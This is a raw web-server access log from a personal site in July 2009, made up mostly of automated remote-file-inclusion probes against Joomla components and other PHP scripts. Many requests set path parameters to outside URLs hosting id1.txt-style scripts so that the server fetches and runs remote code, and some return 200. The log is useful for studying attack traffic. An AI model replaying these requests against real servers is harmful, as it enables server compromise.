130.235.148.242 - - [26/Jul/2009:09:46:24 -0700] "GET /logs///components/com_rsgallery2/rsgallery.html.php?=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:46:24 -0700] "GET /logs/access_080616.log%20%20///components/com_rsgallery2/rsgallery.html.php?=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:46:24 -0700] "GET /logs///components/com_rsgallery2/rsgallery.html.php?=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:46:24 -0700] "GET /logs/access_080616.log%20%20///components/com_rsgallery2/rsgallery.html.php?=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:46:24 -0700] "GET //components/com_rsgallery2/rsgallery.html.php?=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:46:24 -0700] "GET /logs/access_080418.log%20%20///components/com_rsgallery2/rsgallery.html.php?=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:46:24 -0700] "GET //components/com_rsgallery2/rsgallery.html.php?=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:46:25 -0700] "GET /logs/access_080418.log%20%20///components/com_rsgallery2/rsgallery.html.php?=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:46:26 -0700] "GET /logs/access_090221.log%20%20//votebox.php?VoteBoxPath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:46:31 -0700] "GET /logs/access_090221.log%20%20//votebox.php?VoteBoxPath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:46:40 -0700] "GET /logs/access_090106.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:46:45 -0700] "GET /logs/access_080824.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:46:45 -0700] "GET /logs/access_080808.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:46:52 -0700] "GET /logs/access_080824.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:46:56 -0700] "GET /logs/access_080808.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:46:56 -0700] "GET /logs/access_080824.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:47:00 -0700] "GET /logs/access_080808.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:09:47:13 -0700] "GET /logs/access_080107.log%20%20//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:09:47:13 -0700] "GET /logs/access_080718.log%20%20//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:47:36 -0700] "GET /logs/access_081218.log//votebox.php?VoteBoxPath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [26/Jul/2009:09:47:36 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:47:43 -0700] "GET /logs/access_071228.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:47:43 -0700] "GET /logs/access_080114.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:47:44 -0700] "GET /logs/access_081218.log//votebox.php?VoteBoxPath=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.80.195.37 - - [26/Jul/2009:09:47:51 -0700] "GET / HTTP/1.0" 200 21042 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Sgrunt|V109|301|S-527713550|dial; snprtz|T13562000000070|2600#Service Pack 2#2#5#1)" "dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:48:05 -0700] "GET /logs/access_080114.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:48:05 -0700] "GET /logs/access_080106.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.104.188.3 - - [26/Jul/2009:09:48:58 -0700] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.104.188.3 - - [26/Jul/2009:09:48:58 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.104.188.3 - - [26/Jul/2009:09:48:58 -0700] "GET /logs/access_080911.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.104.188.3 - - [26/Jul/2009:09:49:10 -0700] "GET /logs/access_090206.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:09:49:42 -0700] "GET /logs/access_080307.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:09:49:47 -0700] "GET /logs/access_090201.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:49:55 -0700] "GET /logs/index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.104.188.3 - - [26/Jul/2009:09:49:56 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.104.188.3 - - [26/Jul/2009:09:49:56 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [26/Jul/2009:09:49:56 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.2; http://dmulk.com/blog" "dmulk.com"
64.157.4.41 - - [26/Jul/2009:09:49:56 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
218.104.188.3 - - [26/Jul/2009:09:49:57 -0700] "GET /logs/access_090201.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:49:57 -0700] "GET /logs/access_080412.log%20%20/index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:49:57 -0700] "GET /logs/index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:49:59 -0700] "GET /logs/access_080412.log/index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.104.188.3 - - [26/Jul/2009:09:50:01 -0700] "GET /logs/access_080307.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [26/Jul/2009:09:50:05 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.42 - - [26/Jul/2009:09:50:05 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:50:09 -0700] "GET /logs/access_080412.log/index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:50:09 -0700] "GET /logs/index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [26/Jul/2009:09:50:09 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:50:10 -0700] "GET /logs/index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:50:10 -0700] "GET /logs/access_080412.log%20%20/index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:50:11 -0700] "GET /index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 200 21009 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:50:21 -0700] "GET /logs/access_071228.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:50:23 -0700] "GET /index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 200 21009 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:50:27 -0700] "GET /index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 200 21009 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:50:28 -0700] "GET /index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 200 21009 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:50:30 -0700] "GET /logs/access_090223.log/index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:50:30 -0700] "GET /logs/access_090223.log%20%20/index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:50:35 -0700] "GET /logs/access_090223.log/index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:50:35 -0700] "GET /logs/access_090223.log%20%20/index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:51:26 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:51:26 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:51:26 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
38.108.180.47 - - [26/Jul/2009:09:51:27 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:51:27 -0700] "GET /logs/access_090506.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:51:27 -0700] "GET /logs/access_090506.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:51:27 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
38.108.180.47 - - [26/Jul/2009:09:51:27 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.1" 200 727834 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.dmulk.com"
72.30.87.105 - - [26/Jul/2009:09:51:46 -0700] "GET /logs/access_080811.log HTTP/1.0" 200 3447780 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:51:50 -0700] "GET /logs/index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [26/Jul/2009:09:51:51 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:51:53 -0700] "GET /logs/access_080326.log/index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:51:53 -0700] "GET /logs/access_080209.log/index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:52:00 -0700] "GET /logs/index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:52:00 -0700] "GET /logs/access_080326.log/index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:52:01 -0700] "GET /index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [26/Jul/2009:09:52:01 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:52:12 -0700] "GET /logs/access_080209.log/index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:09:52:14 -0700] "GET /logs/access_090213.log//index.php?DOCUMENT_ROOT=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:09:52:14 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:52:15 -0700] "GET /index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 200 21009 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [26/Jul/2009:09:52:15 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:09:52:16 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:09:52:16 -0700] "GET /logs/access_090213.log//index.php?DOCUMENT_ROOT=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [26/Jul/2009:09:52:17 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:09:52:20 -0700] "GET /logs/access_080906.log//index.php?DOCUMENT_ROOT=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:09:52:22 -0700] "GET /logs/access_080906.log//index.php?DOCUMENT_ROOT=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:52:28 -0700] "GET /logs/access_071228.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:52:28 -0700] "GET /logs/access_080114.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:09:52:37 -0700] "GET /index.php?DOCUMENT_ROOT=http://aboutav.com/id1.txt? HTTP/1.1" 200 20986 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:52:38 -0700] "GET /components/com_calendar.php?absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:52:38 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:52:38 -0700] "GET /logs/access_080219.log%20%20//components/com_calendar.php?absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:52:38 -0700] "GET /logs/access_080219.log%20%20//components/com_calendar.php?absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:52:38 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:52:39 -0700] "GET /components/com_calendar.php?absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:52:39 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:52:39 -0700] "GET /logs/access_080219.log%20%20//components/com_calendar.php?absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:09:52:40 -0700] "GET /index.php?DOCUMENT_ROOT=http://aboutav.com/id1.txt? HTTP/1.1" 200 20986 "-" "Mozilla/5.0" "www.dmulk.com"
218.104.188.3 - - [26/Jul/2009:09:52:55 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.104.188.3 - - [26/Jul/2009:09:52:55 -0700] "GET /components/com_calendar.php?absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.104.188.3 - - [26/Jul/2009:09:52:55 -0700] "GET /logs/access_080219.log//components/com_calendar.php?absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:53:03 -0700] "GET /logs/access_080521.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:53:05 -0700] "GET /logs/access_080106.log%20%20//components/com_calendar.php?absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:53:06 -0700] "GET /logs/access_080106.log%20%20//components/com_calendar.php?absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:53:06 -0700] "GET /logs/access_080106.log%20%20//components/com_calendar.php?absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:53:08 -0700] "GET /logs/access_080521.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:53:13 -0700] "GET /logs/access_080516.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:53:18 -0700] "GET /logs/access_080516.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.104.188.3 - - [26/Jul/2009:09:53:22 -0700] "GET /logs/access_080106.log//components/com_calendar.php?absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:53:59 -0700] "GET /logs/access_080219.log//components/com_calendar.php?absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:53:59 -0700] "GET /logs/access_080106.log//components/com_calendar.php?absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:54:03 -0700] "GET /logs/access_080219.log//components/com_calendar.php?absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:54:03 -0700] "GET /logs/access_080106.log//components/com_calendar.php?absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:54:03 -0700] "GET /logs/access_080219.log//components/com_calendar.php?absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:54:03 -0700] "GET /logs/access_080106.log//components/com_calendar.php?absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.110 - - [26/Jul/2009:09:54:40 -0700] "GET /logs/access_071202.log HTTP/1.0" 200 60645 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:54:45 -0700] "GET /logs/access_080313.log/index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [26/Jul/2009:09:54:45 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:54:47 -0700] "GET /logs/index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:55:00 -0700] "GET /index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 200 21009 "-" "Mozilla/5.0" "www.dmulk.com"
